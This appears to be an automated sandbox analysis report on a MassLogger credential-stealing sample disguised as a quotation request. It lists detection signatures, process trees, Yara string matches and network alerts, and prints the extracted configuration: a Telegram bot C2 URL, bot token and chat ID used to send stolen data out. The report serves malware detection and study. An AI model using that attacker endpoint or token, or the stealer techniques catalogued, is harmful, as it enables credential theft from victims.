Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
REQUEST FOR QUOTATION 1307-RFQ.exe

Overview

General Information

Sample name:REQUEST FOR QUOTATION 1307-RFQ.exe
Analysis ID:1576074
MD5:821aec135ea3aa8e02fab9d0cc783a0b
SHA1:67a03996c124db163d83a179f8a517e63d45f742
SHA256:a5d810f05768fff1eeba5ceeb410a0d4d61271fa12c7b5a88251fc1e391f453a
Tags:exeuser-adrian__luca
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to log keystrokes (.Net Source)
Creates files inside the volume driver (system volume information)
Deletes shadow drive data (may be related to ransomware)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • REQUEST FOR QUOTATION 1307-RFQ.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe" MD5: 821AEC135EA3AA8E02FAB9D0CC783A0B)
    • RegSvcs.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 7316 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 56CC9A6FF09CF87495300EA7EEC67B33)
  • alg.exe (PID: 7368 cmdline: C:\Windows\System32\alg.exe MD5: 81093F4AEBE45D63048591DC7BC8A814)
  • FXSSVC.exe (PID: 7580 cmdline: C:\Windows\system32\fxssvc.exe MD5: 1B98ADE6B240EAC1ED51A8847FC157EB)
  • elevation_service.exe (PID: 7708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 422656A98AE1E4FC0F42676F7870266C)
  • maintenanceservice.exe (PID: 7760 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: E78B9CA154BB75A39A7016C4054776F9)
  • msdtc.exe (PID: 7792 cmdline: C:\Windows\System32\msdtc.exe MD5: 84AD1165D1CC1C542C535B1CFAB6AD15)
  • PerceptionSimulationService.exe (PID: 7856 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 5A764611EA22446F05BB79BB3366106F)
  • perfhost.exe (PID: 7900 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 95B91FACFA2553E088397F5D45544CBA)
  • Locator.exe (PID: 7928 cmdline: C:\Windows\system32\locator.exe MD5: 1A71445017EDEBF6811D579BE5438F3B)
  • SensorDataService.exe (PID: 7972 cmdline: C:\Windows\System32\SensorDataService.exe MD5: FEE7BE523832A1DAA28153EE09159969)
  • snmptrap.exe (PID: 8024 cmdline: C:\Windows\System32\snmptrap.exe MD5: D48C35119955A40BE97FC32494D6DEB1)
  • Spectrum.exe (PID: 8056 cmdline: C:\Windows\system32\spectrum.exe MD5: FC42F22F248DDF97255574928099BD4E)
  • ssh-agent.exe (PID: 8156 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 33B97B079F45CE82E6F4A328EBAB3909)
  • TieringEngineService.exe (PID: 2120 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 0EFAE9B5227A7ADB6C73C07C5181848C)
  • AgentService.exe (PID: 2196 cmdline: C:\Windows\system32\AgentService.exe MD5: 46464B0DFA3DB2510FE14D5EF738D11F)
  • vds.exe (PID: 4432 cmdline: C:\Windows\System32\vds.exe MD5: 80D7884B22003F22FE0208D240E92F07)
  • wbengine.exe (PID: 6876 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 04B39AF4F8E72AEADC4486811B47C3B7)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xf173:$a1: get_encryptedPassword
        • 0xf49b:$a2: get_encryptedUsername
        • 0xef0e:$a3: get_timePasswordChanged
        • 0xf02f:$a4: get_passwordField
        • 0xf189:$a5: set_encryptedPassword
        • 0x10ae5:$a7: get_logins
        • 0x10796:$a8: GetOutlookPasswords
        • 0x10588:$a9: StartKeylogger
        • 0x10a35:$a10: KeyLoggerEventArgs
        • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
        • 0x14729:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 18 entries
        SourceRuleDescriptionAuthorStrings
        2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              2.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0xf173:$a1: get_encryptedPassword
              • 0xf49b:$a2: get_encryptedUsername
              • 0xef0e:$a3: get_timePasswordChanged
              • 0xf02f:$a4: get_passwordField
              • 0xf189:$a5: set_encryptedPassword
              • 0x10ae5:$a7: get_logins
              • 0x10796:$a8: GetOutlookPasswords
              • 0x10588:$a9: StartKeylogger
              • 0x10a35:$a10: KeyLoggerEventArgs
              • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
              2.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
              • 0x14729:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 10 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:34.503647+010020516491A Network Trojan was detected192.168.2.4533131.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:27.074299+010020516481A Network Trojan was detected192.168.2.4551051.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:23.085656+010020181411A Network Trojan was detected18.141.10.10780192.168.2.449733TCP
              2024-12-16T14:10:25.157393+010020181411A Network Trojan was detected54.244.188.17780192.168.2.449734TCP
              2024-12-16T14:10:27.185679+010020181411A Network Trojan was detected44.221.84.10580192.168.2.449735TCP
              2024-12-16T14:12:11.300826+010020181411A Network Trojan was detected47.129.31.21280192.168.2.449867TCP
              2024-12-16T14:12:14.072128+010020181411A Network Trojan was detected13.251.16.15080192.168.2.449873TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:23.085656+010020377711A Network Trojan was detected18.141.10.10780192.168.2.449733TCP
              2024-12-16T14:10:25.157393+010020377711A Network Trojan was detected54.244.188.17780192.168.2.449734TCP
              2024-12-16T14:10:27.185679+010020377711A Network Trojan was detected44.221.84.10580192.168.2.449735TCP
              2024-12-16T14:12:11.300826+010020377711A Network Trojan was detected47.129.31.21280192.168.2.449867TCP
              2024-12-16T14:12:14.072128+010020377711A Network Trojan was detected13.251.16.15080192.168.2.449873TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:30.375537+010020577441Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:20.509665+010028032742Potentially Bad Traffic192.168.2.449731158.101.44.24280TCP
              2024-12-16T14:10:28.124938+010028032742Potentially Bad Traffic192.168.2.449731158.101.44.24280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T14:10:20.041310+010028508511Malware Command and Control Activity Detected192.168.2.44973054.244.188.17780TCP
              2024-12-16T14:11:46.431546+010028508511Malware Command and Control Activity Detected192.168.2.44976682.112.184.19780TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeAvira: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
              Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg", "Telegram Chatid": "5839829477"}
              Source: RegSvcs.exe.7360.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendMessage"}
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeReversingLabs: Detection: 81%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49732 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1661345317.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1918851926.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1789345540.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.2033681360.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.2033681360.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vssvc.pdb source: WBEngine.0.etl.23.dr, VSSVC.exe.1.dr
              Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1724571249.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
              Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1695308775.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.2283149621.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2278981032.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1731714155.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.1.dr
              Source: Binary string: wntdll.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669961258.0000000004090000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669485567.00000000041F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Spectrum.pdb source: Spectrum.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.2007127631.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1753798899.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1753798899.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.2264919855.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.2186860033.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2194688859.0000000000680000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatExe.pdb source: Acrobat.exe.1.dr
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000001.00000003.1685892753.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.1.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1941028888.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1927307641.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1713030613.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1739406959.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1740521550.0000000002080000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743596231.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.2264919855.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.2077685079.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.1.dr
              Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1739406959.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1740521550.0000000002080000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743596231.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.2099016563.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: tnameserv.exe.1.dr
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.2186860033.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2194688859.0000000000680000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669961258.0000000004090000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1669485567.00000000041F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1803769593.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1803769593.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
              Source: Binary string: ALG.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1664964581.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: uudf.pdb source: WBEngine.0.etl.23.dr
              Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1719283145.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000001.00000003.1685892753.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vssvc.pdbUGP source: VSSVC.exe.1.dr
              Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1766189016.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.2149428363.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.2259110145.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.2179775011.0000000000A80000.00000004.00001000.00020000.00000000.sdmp
